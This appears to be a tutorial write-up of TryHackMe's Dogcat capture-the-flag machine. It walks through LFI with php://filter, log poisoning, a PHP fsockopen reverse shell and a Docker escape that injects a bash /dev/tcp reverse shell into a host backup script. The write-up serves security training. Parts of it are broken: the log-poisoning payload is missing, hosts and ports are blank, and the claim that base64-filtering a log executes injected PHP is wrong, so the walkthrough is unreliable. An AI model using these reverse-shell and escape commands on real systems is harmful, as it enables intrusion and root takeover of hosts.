Exploiting LFI and Docker Privilege Escalation: A Comprehensive Walkthrough on TryHackMe’s Dogcat Challenge

Introduction

In the realm of cybersecurity, understanding how vulnerabilities like Local File Inclusion (LFI) and container privilege escalation operate is essential for penetration testers and security enthusiasts. In this detailed walkthrough, we will explore the techniques required to exploit the Dogcat challenge on TryHackMe—a scenario that combines LFI vulnerabilities with Docker container privilege escalation. This guide provides step-by-step insights into discovering vulnerabilities, exploiting them, and ultimately gaining full system access. Whether you’re preparing for security certifications or honing your ethical hacking skills, this comprehensive overview covers the latest methods and tools used in these attack vectors as of 2026.

Understanding the Scope of the Dogcat Challenge

The Core Vulnerabilities

The Dogcat machine on TryHackMe features two primary security issues: a Local File Inclusion (LFI) vulnerability with URL parameter manipulation and Docker container privilege escalation. These vulnerabilities offer different attack surfaces and require distinct techniques. LFI allows attackers to read system files and configuration data, potentially exposing sensitive information or even leading to remote code execution (RCE). Meanwhile, Docker privilege escalation leverages misconfigurations within container environments, enabling attackers to break out of containerized restrictions and gain root access on the host system.

In 2026, such vulnerabilities remain prevalent in real-world applications, especially those using outdated configurations or misconfigured container systems, making this knowledge crucial for cybersecurity professionals.

Step 1: Reconnaissance and Target Scanning

Performing an Effective Network Scan

Begin your attack journey by identifying which services are active on the target machine. Using a comprehensive port scan will uncover open ports and running services, essential for subsequent exploits. The nmap utility is a standard tool for this purpose. The basic command to scan all ports with service version detection looks like this:

nmap -sV -p- 

This scan reveals two critical open ports in the Dogcat challenge:

• Port 80: Hosting the website
• Port 22: SSH service

Accessing the web interface on port 80 shows a basic site filled with dog and cat images, hinting at potential input points and vulnerabilities. This phase is vital for understanding the service landscape and planning targeted attacks.

Step 2: Web Enumeration and Detecting Parameter-based Vulnerabilities

Web Application Behavior and URL Analysis

When exploring the Dogcat website, observe the URL patterns closely. The presence of query parameters suggests potential vulnerabilities, especially if those parameters are used insecurely in backend scripts. An example URL might be:

http:///index.php?view=dog

Testing for LFI involves manipulating URL parameters to traverse directories and access unintended files. For instance, trying:

?view=dog/../index

may trigger errors or reveal source code issues. When encountering errors like ‘Cannot redeclare functions,’ alternative techniques like using the php://filter wrapper come into play.

The php://filter mechanism allows reading the source code of files without executing them—crucial for bypassing restrictions and gaining insight into the server’s backend. For example:

http:///?view=php://filter/convert.base64-encode/resource=index.php

This encodes the source, which can then be decoded locally to analyze the code for further vulnerabilities.

Determining the Exploit Strategy

Following successful source code retrieval, identify potential points for abuse. Often, web applications written in PHP or similar languages may include functions or code patterns vulnerable to file inclusion. The goal is to identify a way to include system files or manipulated scripts, leading to remote code execution.

Step 3: Exploiting LFI for Remote Code Execution (RCE)

Log Poisoning Technique

One powerful attack method in LFI exploitation is log poisoning. It involves injecting malicious payloads into server logs—like access logs—by crafting headers or inputs that are reflected in log files, then including these logs via LFI to execute code.

For example, using the User-Agent header, you can inject PHP code directly into the logs:

This payload, when injected into the User-Agent, reflects in the server logs. Later, using LFI to include the log file can execute the malicious PHP code. To do so, inject the log poisoning payload (e.g., through curl or browser), then include the log file with:

index.php?view=php://filter/convert.base64-encode/resource=access.log

Decoding the base64 output gives you the PHP code within the logs. Once the code is accessible, append parameters like cmd= with system commands to run arbitrary code on the server, marking your first major success in compromising the machine.

Step 4: Gaining a Reverse Shell for Persistent Access

From Command Injection to Reverse Shell Access

With execution capabilities established, the next step is obtaining a reverse shell—allowing persistent control over the compromised system. Using PHP, craft a payload that creates a network connection back to your machine; for example:

php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'

Ensure you have a listener ready on the specified port (e.g., via netcat) to catch the shell. Once connected, navigate around the system, enumerate directories, and locate flags or sensitive data.

Step 5: Privilege Escalation Strategies

Assessing User Privileges

After gaining initial access, elevate your privileges to root or administrator level. Begin by running commands such as:

sudo -l

This command lists privileges assigned to the current user without requiring a password, indicating potential for privilege escalation. Common techniques include exploiting misconfigured sudo rights, setuid binaries, and vulnerable services that run as root.

Privilege Escalation in Docker Environments

Many modern applications run inside Docker containers, which can be misconfigured, exposing additional attack vectors. In this challenge, inspecting Docker setup reveals mounting volumes and backup scripts that can be exploited.

• Identify volume mounts between the container and host system
• Look for scripts or backups that run with elevated permissions
• Leverage misconfigured scripts or shared directories to escape container restrictions

For example, examining /opt/backup.sh or launch.sh scripts may reveal commands that can be hijacked or modified to spawn reverse shells, providing uncontrolled access to the host.

Step 6: Docker Escape and Host Privilege Escalation

Leveraging Docker Misconfigurations

In a Docker privilege escalation attack, the key is to exploit container misconfigurations that allow mounting volumes or running privileged commands. For instance, if the container shares the /root directory with the host or executes scripts like backup.sh without proper restrictions, an attacker can inject malicious commands.

One common method involves modifying backup scripts to include reverse shells, such as injecting a Bash command:

bash -i >& /dev/tcp// 0<&1

Once injected, the script runs on the host system, giving an attacker a reverse shell session as root. This approach effectively breaks out of the container, granting full control over the server—a critical step in advanced penetration testing and security auditing.

Summary of Key Insights and Best Practices

• Understanding LFI and its implications: LFI allows attackers to read sensitive files, potentially leading to RCE. Using payloads like the php://filter wrapper offers effective bypass techniques.
• Log poisoning and command injection: Injecting malicious code into server logs can serve as a gateway for executing arbitrary commands remotely.
• Secure Docker configurations: Proper container setups prevent privilege escalation by isolating container processes and restricting volume mounts.
• Privilege escalation techniques: Using privilege escalation commands such as sudo -l, exploiting SUID binaries, and misconfigured scripts are essential tools for attackers and defenders alike.
• Using reverse shells responsibly: Always conduct these tests within authorized environments to avoid legal and ethical violations.

Frequently Asked Questions (FAQs)

What is Local File Inclusion (LFI), and how does it affect web security?

LFI is a vulnerability that allows attackers to include and read files from a server's filesystem, often leading to information disclosure or remote code execution if exploited properly. It affects web security by exposing sensitive configuration files, source code, or enabling code injection attacks.

How does log poisoning enable remote code execution?

Log poisoning involves injecting malicious payloads into server logs via headers or inputs. When these poisoned logs are included through LFI, they can execute code or commands on the server, allowing attackers to take control or escalate privileges.

What are common Docker misconfigurations that lead to privilege escalation?

Common misconfigurations include shared volumes with the host, running containers with privileged mode, or having legacy scripts that allow command injection. These flaws can be exploited to escape containers and gain root access on the host system.

What tools are recommended for reverse shell payloads in 2026?

Tools such as RevShells online generator, Netcat, and custom PHP reverse shell scripts remain effective for establishing connectivity back to the attacker machine. Always test these ethically within legal boundaries.

How can organizations prevent LFI and container privilege escalations?

Implement input validation, disable dangerous PHP functions, and stay updated on security patches. For Docker, use minimal privileges, restrict volume sharing, and monitor container activities to prevent privilege escalation.

Mastering techniques like LFI exploitation and Docker privilege escalation is vital in both offensive and defensive cybersecurity roles. Regular practice on vulnerable environments like TryHackMe helps prepare security professionals to defend against real-world threats effectively in 2026 and beyond.